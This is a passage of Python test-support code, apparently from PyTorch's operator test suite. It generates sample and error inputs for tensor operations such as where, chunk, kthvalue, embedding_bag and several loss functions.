// 2, L, 2)), ((L, L, L), (L, L, L,), (1, 0, L, 1)), ((L, L, L), (L, L // 2, L,), (1, L // 2, L, 1)), ((L, L, L), (L, L // 4, L,), (1, L // 2, L, 2)), ((L, L, L), (L, L, L,), (2, 0, L, 1)), ((L, L, L), (L, L, L // 2,), (2, L // 2, L, 1)), ((L, L, L), (L, L, L // 4,), (2, L // 2, L, 2)), ) for input_shape, src_shape, args in cases: input_ = 
make_arg(input_shape)
        src = make_arg(src_shape)
        yield SampleInput(input_, args=(src, *args))


def sample_inputs_expand(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    cases = (((S, 1, 1), (S, S, S)),
             ((S, 1, S), (S, S, S)),
             ((S, 1, S), (-1, S, -1)),
             ((S, 1, S), (-1, S, S)),
             ((S, 1), (S, S, S)),
             ((1,), (S, S, S)),
             ((1, S), (1, 1, S)),
             ((), ()),
             ((), (1, 3, 2)),
             )

    for case in cases:
        shape, args = case
        yield(SampleInput(make_arg(shape), args=(args, )))


def sample_inputs_conversion(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    shapes = ((),
              (2, 3))
    memory_format_options = [None, torch.contiguous_format]

    for shape, memory_format in itertools.product(shapes, memory_format_options):
        yield SampleInput(make_arg(shape),
                          kwargs={'memory_format': memory_format} if memory_format else {})
    yield SampleInput(make_arg((2, 3, 2, 3)), kwargs={'memory_format': torch.channels_last})


def sample_inputs_expand_as(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device)

    cases = (((S, 1, 1), (S, S, S)),
             ((), ()),
             ((), (1, 1)),
             )

    for shape, shape_other in cases:
        yield(SampleInput(make_arg(shape, requires_grad=requires_grad),
                          args=(make_arg(shape_other, requires_grad=False), )))


def sample_inputs_where(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    def make_bool_mask(shape):
        # Make sure at least one element is nonzero,
        # except for empty tensor
        mask_t = make_tensor(shape, dtype=torch.bool, device=device, requires_grad=False)

        if mask_t.numel() == 0:
            return mask_t
        elif mask_t.numel() == 1:
            mask_t.fill_(True)
            return mask_t

        if mask_t.sum() == 0:
            def random_index(shape):
                return tuple(map(lambda max_idx: random.randint(0, max_idx), shape))

            mask_t[random_index(mask_t.shape)] = True
            return mask_t

        return mask_t

    cases = (((M, M), (M, M), (M, M), False),
             ((M, 1, M), (M, M), (M, M, 1), True),
             ((), (), (), False),
             ((M, 1, M), (), (M, M, 1), True),
             ((), (M, M), (), True),)

    for shape, mask_shape, other_shape, broadcasts_input in cases:
        yield SampleInput(make_arg(shape),
                          args=(make_bool_mask(mask_shape), make_arg(other_shape)),
                          broadcasts_input=broadcasts_input)

# TODO: add reference inputs for where(condition) signature
def reference_inputs_where(op, device, dtype, requires_grad, **kwargs):
    yield from sample_inputs_where(op, device, dtype, requires_grad, **kwargs)

    make_cond = partial(make_tensor, dtype=torch.bool, device=device, requires_grad=requires_grad)
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    # noncontiguous
    c = make_cond((10, 3), noncontiguous=True)
    a = make_arg((10, 1), noncontiguous=True)
    b = make_arg((3, 10, 3)).transpose(0, -1)

    # NOTE that the OpInfo for where takes samples of the form a, cond, b
    yield SampleInput(a, args=(c, b))

    # type promoting
    other_dtype = torch.double if dtype is not torch.double else torch.long
    c = make_cond((10, 3), noncontiguous=True)
    a = make_arg((10, 1), dtype=torch.long)
    b = make_arg((10, 1))

    yield SampleInput(a, args=(c, b))

    # NaN propagation
    if dtype.is_floating_point or dtype.is_complex:
        if dtype.is_floating_point:
            nan = float('nan')
        else:
            # dtype.is_complex
            nan = complex(float('nan'), float('nan'))
        c = make_cond((1, 10, 3))
        a = make_arg((10, 3), noncontiguous=True)
        a[2, 1] = nan
        b = make_arg((1, 3))
        b[0, 2] = nan

        yield
SampleInput(a, args=(c, b)) def error_inputs_where(op_info, device, **kwargs): shape = (S,) err_msg = "Expected all tensors to be on the same device" for devices in product(('cpu', device), repeat=3): if len(set(devices)) == 2: si = SampleInput(make_tensor(shape, device=devices[0], dtype=torch.float32), args=(make_tensor(shape, dtype=torch.bool, device=devices[1]), make_tensor(shape, device=devices[2], dtype=torch.float32))) yield ErrorInput(si, error_regex=err_msg) def sample_inputs_nonzero(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) sizes = ((), (S,), (S, S), (S, S, S), (S, 1, S), (S, 0, S)) inputs = [] for shape in sizes: # construct input without any non-zero elements zeros = torch.zeros(shape, dtype=dtype, device=device, requires_grad=requires_grad) inputs.append(zeros) # construct input with mixed zero and non-zero elements mixed = make_arg(shape).requires_grad_(False) mask_t = make_tensor(shape, dtype=torch.bool, device=device, requires_grad=False) mixed[mask_t] = 0 inputs.append(mixed) for input_t, as_tuple in product(inputs, [False, True]): yield(SampleInput(input_t.clone().requires_grad_(requires_grad), kwargs=dict(as_tuple=as_tuple))) def sample_inputs_chunk(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((S, S, S), (2,)), ((S, S, S), (S, 1)), ((S, S, S), (S, -1))) for case in cases: shape, args = case yield(SampleInput(make_arg(shape), args=args)) def reference_inputs_chunk(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_chunk(op, device, dtype, requires_grad, **kwargs) make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) # shape x chunks x dim cases = ( ((13, 9, 11), 17, -1), ((13, 9, 11), 11, -1), ((13,), 12, -1), ((15,), 12, -1), ((15,), 7, 0), ((15,), 9, 0), ((3, 7), 9, 1), ((3, 7), 9, 0), ((3, 7), 2, 0), ((3, 7), 3, 0), ((3, 7), 1, 0), ((3, 7), 1, 1), ((4, 4), 2, 0), ) for shape, chunks, dim in cases: yield SampleInput(make_arg(shape), args=(chunks, dim)) def sample_inputs_kthvalue(op_info, device, dtype, requires_grad, **kwargs): def _tensor(shape, dtype=dtype, low=None, high=None): return make_tensor(shape, dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad) test_cases = [ (_tensor((S, S, S)), (2,)), (_tensor((S, S, S)), (2, 1,)), (_tensor((S, S, S)), (2, -1,)), (_tensor((S, S, S)), (2, 1, True,)), (_tensor((S, S, S)), (2, -1, True,)), (_tensor((S,)), (2, 0,)), (_tensor((S,)), (2, 0, True,)), (_tensor(()), (1,)), (_tensor(()), (1, 0,)), (_tensor(()), (1, 0, True)) ] return [SampleInput(tensor, args=args) for tensor, args in test_cases] def error_inputs_kthvalue(op_info, device, **kwargs): # tests overlapping output fails t = make_tensor(10, dtype=torch.float32, device=device) indices = torch.empty((), device=device, dtype=torch.long) si = SampleInput(t, args=(5,), kwargs={'out': (t, indices)}) k_out_of_range_err = "selected number k out of range for dimension" return (ErrorInput(si, error_regex="unsupported operation"), ErrorInput(SampleInput(torch.randn(2, 2, device=device), args=(3, 0)), error_regex=k_out_of_range_err), ErrorInput(SampleInput(torch.randn(2, 2, device=device), args=(3,)), error_regex=k_out_of_range_err), ErrorInput(SampleInput(torch.tensor(2, device=device), args=(3,)), error_regex=k_out_of_range_err),) def sample_inputs_dropout(op_info, device, dtype, requires_grad, *, 
train=None, valid_input_dim=None, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) if valid_input_dim: cases = ((S,) * i for i in valid_input_dim) else: cases = ((S, S), (S,), ()) p_vals = [0.0, 0.5, 1.0] # This is to handle special case for feature_alpha_dropout which has different # supported dtypes depending on `train` parameter training_vals = [train] if train is not None else [True, False] for case, p, training in product(cases, p_vals, training_vals): yield SampleInput(make_arg(case), kwargs=dict(p=p, training=training)) yield SampleInput(make_arg(case), kwargs=dict()) def sample_inputs_embedding_bag(op_info, device, dtype, requires_grad, **kwargs): def make_input(shape): return make_tensor(shape, device=device, dtype=dtype, requires_grad=requires_grad) def make_long_input(shape, *, low, high, noncontiguous=False): return make_tensor(shape, device=device, dtype=torch.long, low=low, high=high, noncontiguous=noncontiguous) def make_per_sample_weight(flag, idx): # a tensor of float / double weights, or None # to indicate all weights should be taken to be 1 if flag: return make_input(idx.shape) return None offsets = torch.tensor([0, 3], device=device, dtype=torch.long) for generate_per_sample_weight in (True, False): for mode in ('sum', 'mean', 'max'): # per_sample_weights is only supported for mode='sum' (got mode='****') if generate_per_sample_weight and mode in ('mean', 'max'): continue # 1-D index tensor idx = make_long_input((S,), low=0, high=M) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(make_input((M, S)), args=(idx,), kwargs={'offsets': offsets, 'mode': mode, 'per_sample_weights': per_sample_weights}) idx = make_long_input((S,), low=0, high=M, noncontiguous=True) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(make_input((M, S)), args=(idx,), kwargs={'offsets': offsets, 'mode': mode, 'per_sample_weights': per_sample_weights}) # bag with zero length idx = make_long_input((S,), low=0, high=M, noncontiguous=True) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(make_input((M, S)), args=(idx,), kwargs={'offsets': torch.tensor([0, 0, 3], device=device, dtype=torch.long), 'mode': mode, 'per_sample_weights': per_sample_weights}) # 2-D index tensor idx = make_long_input((S, S), low=0, high=M) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(make_input((M, S)), args=(idx,), kwargs={'mode': mode, 'per_sample_weights': per_sample_weights}) idx = make_long_input((S, S), low=0, high=M, noncontiguous=True) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(make_input((M, S)), args=(idx,), kwargs={'mode': mode, 'per_sample_weights': per_sample_weights}) # The gradient vector at `padding_idx` is not updated. 
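            # (Illustrative note: entries equal to `padding_idx` contribute
            # nothing to their bag, so the corresponding weight rows keep a
            # zero gradient; both negative and positive values of
            # `padding_idx` are exercised below.)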
# Negative padding_idx
            idx = make_long_input((6,), low=0, high=S)
            idx[0] = 4
            idx[4] = 4
            per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx)
            yield SampleInput(make_input((S, S)), args=(idx,),
                              kwargs={'padding_idx': -1, 'offsets': offsets,
                                      'mode': mode, 'per_sample_weights': per_sample_weights},)

            idx = make_long_input((3, 3), low=0, high=S)
            # Positive padding_idx
            idx[0, 0] = 2
            idx[1, 1] = 2
            per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx)
            yield SampleInput(make_input((S, S)), args=(idx,),
                              kwargs={'padding_idx': 2, 'mode': mode,
                                      'per_sample_weights': per_sample_weights},)

            idx = make_long_input((6, ), low=0, high=S)
            weights = make_input((S, S))
            offsets_ = torch.tensor([0, 3, 6], device=device, dtype=torch.long)
            per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx)
            yield SampleInput(weights, args=(idx,),
                              kwargs={'mode': mode, 'offsets': offsets_, 'include_last_offset': True},)

            if not requires_grad:
                # Following inputs return different gradient from the numerical gradient.
                # This is expected and relevant tests are present in `test_nn.py`.

                # Due to inplace renorming of weight, the numerical gradient doesn't match the
                # analytical gradient.
                idx = make_long_input((2, 2), low=0, high=S)
                weights = make_input((S, S)) * 2
                per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx)
                yield SampleInput(weights, args=(idx,),
                                  kwargs={'max_norm': 1., 'mode': mode,
                                          'per_sample_weights': per_sample_weights},)

                idx = make_long_input((6, ), low=0, high=S)
                weights = make_input((S, S)) * 2
                per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx)
                yield SampleInput(weights, args=(idx,),
                                  kwargs={'max_norm': 1., 'norm_type': 1.0,
                                          'mode': mode, 'offsets': offsets,
                                          'per_sample_weights': per_sample_weights},)

                if mode != 'max':
                    # Scale the gradient based on the inverse frequency of a particular index.
                    # Note : max mode does not support sparse weights
                    idx = make_long_input((2, 2), low=0, high=S)
                    idx[0, 0] = 1
                    idx[0, 1] = 1
                    weights = make_input((S, S))
                    per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx)
                    yield SampleInput(weights, args=(idx,),
                                      kwargs={'scale_grad_by_freq': True, 'mode': mode,
                                              'per_sample_weights': per_sample_weights},)

                    # gradcheck not implemented for sparse tensors.
                    # Note: max mode does not support sparse weights
                    idx = make_long_input((6, ), low=0, high=S)
                    weights = make_input((S, S))
                    per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx)
                    yield SampleInput(weights, args=(idx,),
                                      kwargs={'sparse': True, 'offsets': offsets,
                                              'mode': mode,
                                              'per_sample_weights': per_sample_weights})

                    idx = make_long_input((6, ), low=0, high=S)
                    idx[0] = 1  # freq more than 1
                    idx[1] = 1  # freq more than 1
                    idx[3] = 0  # padding_idx
                    weights = make_input((S, S)) * 2
                    per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx)
                    yield SampleInput(weights, args=(idx,),
                                      kwargs={'sparse': True, 'scale_grad_by_freq': True,
                                              'padding_idx': 0, 'max_norm': 1.,
                                              'offsets': offsets, 'mode': mode,
                                              'per_sample_weights': per_sample_weights})


def sample_inputs_embedding(op_info, device, dtype, requires_grad, **kwargs):
    def make_input(shape):
        return make_tensor(shape, device=device, dtype=dtype, requires_grad=requires_grad)

    def make_long_input(shape, *, low, high):
        return make_tensor(shape, device=device, dtype=torch.long, low=low, high=high)

    # 0-D index tensor
    idx = make_long_input((), low=0, high=M)
    yield SampleInput(make_input((M, S)), args=(idx,),)

    # 1-D index tensor
    idx = make_long_input((S,), low=0, high=M)
    yield SampleInput(make_input((M, S)), args=(idx,),)

    # 2-D index tensor
    idx = make_long_input((S, S), low=0, high=M)
    yield SampleInput(make_input((M, S)), args=(idx,),)

    if not requires_grad:
        # The following inputs return a gradient that differs from the numerical
        # gradient. This is expected, and the relevant tests are present in
        # `test_nn.py`.

        # The gradient vector at `padding_idx` is not updated.
        idx = make_long_input((2, 2), low=0, high=S)
        idx[0, 0] = 2
        idx[1, 1] = 2
        yield SampleInput(make_input((S, S)), args=(idx,), kwargs={'padding_idx': 2},)

        idx = make_long_input((2, 2), low=0, high=S)
        idx[0, 0] = 4
        idx[1, 1] = 4
        yield SampleInput(make_input((S, S)), args=(idx,), kwargs={'padding_idx': -1},)

        # Due to the inplace renorming of weight, the numerical gradient doesn't
        # match the analytical gradient.
        idx = make_long_input((2, 2), low=0, high=S)
        weights = make_input((S, S)) * 2
        yield SampleInput(weights, args=(idx,), kwargs={'max_norm': 1.},)

        idx = make_long_input((2, 2), low=0, high=S)
        weights = make_input((S, S)) * 2
        yield SampleInput(weights, args=(idx,), kwargs={'max_norm': 1., 'norm_type': 1.0},)

        # Scale the gradient based on the inverse frequency of a particular index.
        idx = make_long_input((2, 2), low=0, high=S)
        idx[0, 0] = 1
        idx[0, 1] = 1
        weights = make_input((S, S))
        yield SampleInput(weights, args=(idx,), kwargs={'scale_grad_by_freq': True},)

        # gradcheck not implemented for sparse tensors.
idx = make_long_input((2, 2), low=0, high=S) weights = make_input((S, S)) yield SampleInput(weights, args=(idx,), kwargs={'sparse': True}) idx = make_long_input((3, 3), low=0, high=S) idx[0, 0] = 1 # freq more than 1 idx[0, 1] = 1 # freq more than 1 idx[1, 0] = 0 # padding_idx weights = make_input((S, S)) * 2 yield SampleInput(weights, args=(idx,), kwargs={'sparse': True, 'scale_grad_by_freq': True, 'padding_idx': 0, 'max_norm': 1.}) def sample_inputs_one_hot(op_info, device, dtype, requires_grad, **kwargs): def make_input(shape, *, low, high): return make_tensor(shape, device=device, dtype=dtype, low=low, high=high, requires_grad=requires_grad) shapes = ((), (S,), (L, M, S)) num_classess = (-1, 10) return [ SampleInput( make_input( shape, low=0, high=10 if num_classes == -1 else num_classes // 2, ), kwargs=dict(num_classes=num_classes), ) for shape, num_classes in itertools.product(shapes, num_classess) ] def sample_inputs_tensorinv(op_info, device, dtype, requires_grad, **kwargs): make_arg = make_fullrank_matrices_with_distinct_singular_values def make_input(): return make_arg(12, 12, device=device, dtype=dtype, requires_grad=requires_grad) # lhs / rhs shape can have any number of dimensions as long as their product equals 12 shapes = [ ((2, 2, 3), (12, 1)), ((4, 3), (6, 1, 2)), ] samples = [] for shape_lhs, shape_rhs in shapes: inp = make_input().reshape(*shape_lhs, *shape_rhs).detach() inp.requires_grad_(requires_grad) samples.append(SampleInput(inp, kwargs=dict(ind=len(shape_lhs)))) return samples def sample_inputs_tensorsolve(op_info, device, dtype, requires_grad, **kwargs): a_shapes = [(2, 3, 6), (3, 4, 4, 3)] # Zero-dim tensors are not supported in NumPy, so we skip them for now. # NumPy is used in reference check tests. # See https://github.com/numpy/numpy/pull/20482 for tracking NumPy bugfix. 
    # a_shapes += [(0, 0, 1, 2, 3, 0)]
    dimss = [None, (0, 2)]

    for a_shape, dims in itertools.product(a_shapes, dimss):
        a = make_tensor(a_shape, dtype=dtype, device=device, requires_grad=requires_grad)
        b = make_tensor(a_shape[:2], dtype=dtype, device=device, requires_grad=requires_grad)
        yield SampleInput(a, args=(b,), kwargs=dict(dims=dims))


def sample_inputs_loss(op_info, device, dtype, requires_grad, **kwargs):
    rhs_requires_grad = kwargs.get('rhs_requires_grad', requires_grad)
    _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Although most losses also support the reduce and size_average combination instead of
    # reduction, the former is deprecated since 0.4.1 and thus is not tested
    shapes_and_kwargs = (
        ((), None),
        ((S,), dict(reduction="mean")),
        ((S,), dict(reduction="sum")),
        ((S,), dict(reduction="none")),
        ((S, S), None),
        ((S, S, S), None),
    )

    for shape, kwargs in shapes_and_kwargs:
        yield SampleInput(_make_tensor(shape),
                          args=(_make_tensor(shape, requires_grad=rhs_requires_grad),),
                          kwargs=kwargs)


def sample_inputs_grid_sample(op_info, device, dtype, requires_grad, **kwargs):
    _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    batch_size = 2
    num_channels = 3
    modes = ("bilinear", "nearest")
    align_cornerss = (False, True)
    padding_modes = ("zeros", "border", "reflection")

    sample_inputs = []
    for dim in (2, 3):
        modes_ = (*modes, "bicubic") if dim == 2 else modes

        for mode, padding_mode, align_corners in itertools.product(modes_, padding_modes, align_cornerss):
            sample_inputs.append(
                SampleInput(
                    _make_tensor((batch_size, num_channels, *[S] * dim)),
                    args=(_make_tensor((batch_size, *[S] * dim, dim)),),
                    kwargs=dict(
                        mode=mode,
                        padding_mode=padding_mode,
                        align_corners=align_corners,
                    )
                )
            )

    return sample_inputs


def sample_inputs_cosine_embedding_loss(op_info, device, dtype, requires_grad, **kwargs):
    make_input = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    def make_target(shape):
        shape = () if len(shape) == 1 else (shape[0], )
        t = torch.randint(0, 2, shape, device=device, dtype=torch.long)
        # Label with -1 or 1
        t = t * 2 - 1
        target = t.to(dtype=dtype).detach_().requires_grad_(requires_grad)
        return target

    shapes = ((S, S), (S,))
    reductions = ('none', 'mean', 'sum')
    for s, r in product(shapes, reductions):
        yield SampleInput(
            make_input(s),
            args=(make_input(s), make_target(s)),
            kwargs=dict(reduction=r, margin=random.uniform(-1, 1))
        )


def sample_inputs_ctc_loss(op_info, device, dtype, requires_grad, **kwargs):
    input_length = 50
    batch = 16
    num_char = 20
    target_length = 30

    def make_log_probs(s):
        t = make_tensor(s, device=device, dtype=dtype)
        log_probs = t.log_softmax(2).to(device=device, dtype=dtype).detach().requires_grad_(requires_grad=requires_grad)
        return log_probs

    reductions = ('none', 'mean', 'sum')
    zero_inf = (True, False)
    for r, z in product(reductions, zero_inf):
        log_probs = make_log_probs((input_length, batch, num_char))
        targets = torch.randint(1, num_char, (batch, target_length), dtype=torch.long, device=device)
        input_lengths = torch.full((batch, ), input_length, dtype=torch.long, device=device)
        target_lengths = torch.randint(10, target_length, (batch, ), dtype=torch.long, device=device)

        yield SampleInput(log_probs, args=(targets, input_lengths, target_lengths,),
                          kwargs=dict(reduction=r, zero_infinity=z))


def sample_inputs_nll_loss(op_info, device, dtype, requires_grad, **kwargs):
    shape = (2, 3)
    num_classes = shape[1]
    make_input = partial(make_tensor, device=device, dtype=dtype,
                         requires_grad=requires_grad)
    # FIXME: Derivative wrt. weight not implemented
    make_weight = partial(make_tensor, num_classes, device=device, dtype=dtype, requires_grad=False)

    def make_target(shape, zeros=False):
        s = (shape[0], *shape[2:]) if len(shape) > 1 else ()
        if zeros:
            return torch.zeros(s, device=device, dtype=torch.long)
        else:
            return make_tensor(s,
                               low=0,
                               high=shape[1] if len(shape) > 1 else shape[0],
                               device=device,
                               dtype=torch.long)

    def gen_shape_kwargs():
        # Batched, non-batched and 2d
        shapes = (shape, (num_classes,), shape + (2, 2))
        reductions = ('none', 'mean', 'sum')
        for reduction, s in product(reductions, shapes):
            yield make_input(s), make_target(s), dict(reduction=reduction)
            yield make_input(s), make_target(s), dict(weight=make_weight(), reduction=reduction)
            yield make_input(s), make_target(s), dict(weight=make_weight(low=0), reduction=reduction)
            yield make_input(s), make_target(s), dict(weight=make_weight(high=0), reduction=reduction)
            t = make_target(s)
            ignore = num_classes // 2
            # If "mean", nll returns NaN, so it's not differentiable at those points
            if t.eq(ignore).all() and reduction == "mean":
                t.fill_(0)
            yield make_input(s), t, dict(ignore_index=num_classes // 2, reduction=reduction)
            yield make_input(s), t, dict(ignore_index=num_classes // 2, reduction=reduction, weight=make_weight())
            # Test ignoring all the targets
            # If "mean", nll returns NaN, so it's not differentiable at those points
            if reduction != "mean":
                yield make_input(s), make_target(s, zeros=True), dict(ignore_index=0, reduction=reduction)

    for input, target, kwargs in gen_shape_kwargs():
        yield SampleInput(input, args=(target,), kwargs=kwargs)


def sample_inputs_binary_cross_entropy_with_logits(
    op_info, device, dtype, requires_grad, **kwargs
):
    make = partial(make_tensor, device=device, dtype=dtype)
    make_prob = partial(make, low=0, high=1)
    reductions = ("mean", "sum", "none")

    def make_weight_shape_kwargs():
        kwargs = []
        for shape in ((1,), (1, S), (S,), (S, S)):
            kwargs.extend([((S, S), dict(reduction=reduction, weight=make(shape))) for reduction in reductions])
        return kwargs

    shapes_and_kwargs = [
        *[(shape, None) for shape in ((), (1,), (S,), (S, S), (S, S, S))],
        *[((S, S), dict(reduction=reduction)) for reduction in reductions],
        *make_weight_shape_kwargs(),
        *[((S, S), dict(reduction=reduction, pos_weight=make((S,), low=0))) for reduction in reductions],
        *[((S, S), dict(reduction=reduction, weight=make((S, S)), pos_weight=make((S,), low=0))) for reduction in reductions],
    ]

    for shape, kwargs in shapes_and_kwargs:
        yield SampleInput(
            make(shape, requires_grad=requires_grad),
            args=(make_prob(shape, requires_grad=requires_grad),),
            kwargs=kwargs,
        )


def sample_inputs_argwhere(op_info, device, dtype, requires_grad, **kwargs):
    yield SampleInput(torch.tensor([1, 0, 2, 0], dtype=dtype, device=device, requires_grad=requires_grad))

    mask = torch.tensor([[0, 1, 0, 1, 0],
                         [1, 1, 1, 1, 0],
                         [0, 0, 0, 1, 0],
                         [1, 0, 1, 1, 0],
                         [1, 0, 0, 1, 0]], dtype=torch.bool, device=device)
    t = make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad)
    t[mask] = 0
    yield SampleInput(t)

    t = make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad, noncontiguous=True)
    t[mask] = 0
    yield SampleInput(t)

    t = make_tensor((S, 0), dtype=dtype, device=device, requires_grad=requires_grad)
    yield SampleInput(t)

    yield SampleInput(torch.zeros((S,), dtype=dtype, device=device, requires_grad=requires_grad))
    yield SampleInput(make_tensor((), dtype=dtype, device=device, requires_grad=requires_grad))


def _generate_sample_shape_reduction():
    shapes = ((S,), (S, S), (S, S, S))
    reductions = ('none', 'mean', 'sum')
    for s, r in product(shapes, reductions):
        yield s, r


def sample_inputs_gaussian_nll_loss(op_info, device, dtype, requires_grad, **kwargs):
    _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)
    # Set low slightly above 0 so gradcheck doesn't accidentally dip below 0
    make_var = partial(make_tensor, low=0.1, device=device, dtype=dtype, requires_grad=requires_grad)

    def gen_shape(shape):
        yield shape
        # Broadcast
        yield (*shape[:-1], 1)
        yield shape[:-1]

    def gen_shape_kwargs():
        for s, r in _generate_sample_shape_reduction():
            for t_s, v_s in product(gen_shape(s), gen_shape(s)):
                yield _make_tensor(s), _make_tensor(t_s), make_var(v_s), dict(reduction=r)
                yield (
                    _make_tensor(s), _make_tensor(t_s), make_var(v_s),
                    dict(full=True, reduction=r)
                )
                yield (
                    _make_tensor(s), _make_tensor(t_s), make_var(v_s),
                    dict(eps=random.uniform(1e-6, 1e-3), reduction=r)
                )
                yield (
                    _make_tensor(s), _make_tensor(t_s), make_var(v_s),
                    dict(full=True, eps=random.uniform(1e-6, 1e-3), reduction=r)
                )

    for input, target, var, kwargs in gen_shape_kwargs():
        yield SampleInput(input, args=(target, var, ), kwargs=kwargs)


def _generate_sample_inputs_nn_loss(op_info, device, dtype, requires_grad, **kwargs):
    _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    for s, r in _generate_sample_shape_reduction():
        yield _make_tensor(s), _make_tensor(s), dict(reduction=r)


def sample_inputs_hinge_embedding_loss(op_info, device, dtype, requires_grad, **kwargs):
    for input, target, d in _generate_sample_inputs_nn_loss(op_info, device, dtype, requires_grad, **kwargs):
        # target should contain either 1 or -1 as per docs
        mask = torch.rand_like(target) > 0.5
        target[mask] = 1
        target[~mask] = -1
        d['margin'] = random.uniform(-9, 9)
        yield SampleInput(input, args=(target, ), kwargs=d)

    # scalar input and target.
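    # (A 0-dim sample exercises the scalar path; `margin` is left at its default of 1.0.)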
_make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(_make_tensor(()), args=(_make_tensor(()), )) def error_inputs_hinge_embedding_loss(op, device, **kwargs): make_input = partial(make_tensor, device=device, dtype=torch.float32) # invalid reduction value yield ErrorInput(SampleInput(make_input(5, 4), args=(make_input(5, 4),), kwargs={'reduction': 'abc'}), error_type=ValueError, error_regex='is not a valid value') def reference_inputs_hinge_embedding_loss(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_hinge_embedding_loss(op, device, dtype, requires_grad, **kwargs) make_input = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) for reduction in ('sum', 'mean', 'none'): if dtype.is_floating_point: # only supports ints and floats # NaN propagation inp = make_input((10, )) inp[2] = float('nan') target = make_input((10, )) # target should contain either 1 or -1 as per docs mask = torch.rand_like(target) > 0.5 target[mask] = -1 target[~mask] = 1 yield SampleInput(inp, args=(target,), kwargs={'reduction': reduction}) # Inf Handling inp = make_input((10, )) inp[4] = float('inf') target = make_input((10, )) mask = torch.rand_like(target) > 0.5 target[mask] = -1 target[~mask] = 1 yield SampleInput(inp, args=(target,), kwargs={'reduction': reduction}) # Broadcasting inp = make_input((5, 5)) target = make_input((1, 5)) mask = torch.rand_like(target) > 0.5 target[mask] = -1 target[~mask] = 1 yield SampleInput(inp, args=(target,), kwargs={'reduction': reduction}) def sample_inputs_huber_loss(op_info, device, dtype, requires_grad, **kwargs): for input, target, d in _generate_sample_inputs_nn_loss(op_info, device, dtype, requires_grad, **kwargs): d['delta'] = random.uniform(1e-3, 9) yield SampleInput(input, args=(target, ), kwargs=d) def sample_inputs_poisson_nll_loss(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) def gen_shape_kwargs(): for s, r in _generate_sample_shape_reduction(): for li in (True, False): for f in (True, False): i1 = _make_tensor(s) i2 = _make_tensor(s) # For Poisson NLL Loss, # target is assumed to be from # Poisson Distribution which # always has positive samples t1 = _make_tensor(s, low=0) t2 = _make_tensor(s, low=0) if not li: i1.abs_() i2.abs_() t1.abs_() t2.abs_() yield ( i1, t1, dict(log_input=li, full=f, reduction=r) ) yield ( i2, t2, dict(log_input=li, full=f, eps=random.uniform(1e-8, 1e-3), reduction=r) ) for input, target, kwargs in gen_shape_kwargs(): yield SampleInput(input, args=(target, ), kwargs=kwargs) def sample_inputs_triplet_margin_loss(op_info, device, dtype, requires_grad, with_distance=False, **kwargs): make = partial(make_tensor, (S, M), device=device, dtype=dtype, requires_grad=requires_grad) kwargss = ( *[dict(margin=margin) for margin in (1e-6, 1.0, 10.0)], dict(swap=True), *[dict(reduction=reduction) for reduction in ("mean", "sum", "none")], ) for kwargs in kwargss: input = make() args = (make(), make()) if with_distance: kwargs["distance_function"] = torch.nn.PairwiseDistance() yield SampleInput(input, args=args, kwargs=kwargs) def sample_inputs_pairwise_distance(op_info, device, dtype, requires_grad, **kwargs): make = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) shape = (3,) batched_shape = (2, *shape) shapes_and_kwargs = [ (shape, None), (batched_shape, None), (shape, dict(keepdim=True)), (batched_shape, 
